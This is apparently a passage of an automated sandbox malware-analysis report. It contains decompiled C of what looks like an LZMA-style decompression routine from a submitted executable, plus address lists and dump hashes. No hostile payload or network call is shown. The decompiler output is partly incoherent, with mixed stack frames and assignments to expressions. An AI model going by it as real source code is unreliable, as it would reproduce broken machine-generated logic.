													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                0x00000000
                0x00406440
                0x00406440
                0x00406444
                0x00406451
                0x0040645b
                0x00000000
                0x00406446
                0x00406446
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x0040637a
                0x0040637d
                0x004066ef
                0x004066ef
                0x004066ef
                0x004066f2
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00406740
                0x00406744
                0x004068f3
                0x00406909
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00406925
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x0040676b
                0x0040676b
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00000000
                0x00405f21
                0x00000000
                0x00000000
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00000000
                0x00406872
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x004066ef
                0x004066ef
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00000000
                0x00406881
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f3
                0x00000000
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x004060ec
                0x00000000
                0x00406322
                0x00406326
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x00000000
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066b9
                0x004066bd
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066ef
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x00000000
                0x004067ad
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x0040686a
                0x0040676b
                0x00000000
                0x00000000
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x004064b8
                0x004064bb
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c2
                0x004064c3
                0x004064c6
                0x004064cd
                0x004064d0
                0x004064de
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x00000000
                0x004067c3
                0x004067c3
                0x004067c7
                0x004068ff
                0x00000000
                0x004068ff
                0x004067cd
                0x004067d0
                0x004067d3
                0x004067d7
                0x004067da
                0x004067e0
                0x004067e2
                0x004067e2
                0x004067e2
                0x004067e5
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067eb
                0x004067ef
                0x0040684f
                0x00406852
                0x00406857
                0x00406858
                0x0040685a
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x00000000
                0x00406771
                0x0040676b
                0x004067f1
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x0040680f
                0x00406812
                0x0040682b
                0x0040682e
                0x00406831
                0x00406834
                0x00406838
                0x0040683a
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x0040681c
                0x00406821
                0x00406823
                0x00406826
                0x00406826
                0x00406841
                0x00406848
                0x00000000
                0x0040684a
                0x00000000
                0x0040684a
                0x00000000
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004066f2
                0x004066ef
                0x00000000
                0x00406444

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                • Instruction ID: e3f6d56364c83544c85f79d99d02007aa6d07438f45ea059adc5b55077a757f2
                • Opcode Fuzzy Hash: eca11b504c20c6a4dff8dbd418dcdd560ad59529dc9179efd0dbdc64f654f703
                • Instruction Fuzzy Hash: 30714671D00229CFDF28CF98C844BADBBB1FB44305F25816AD856BB281D7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040638C Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E0040638C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
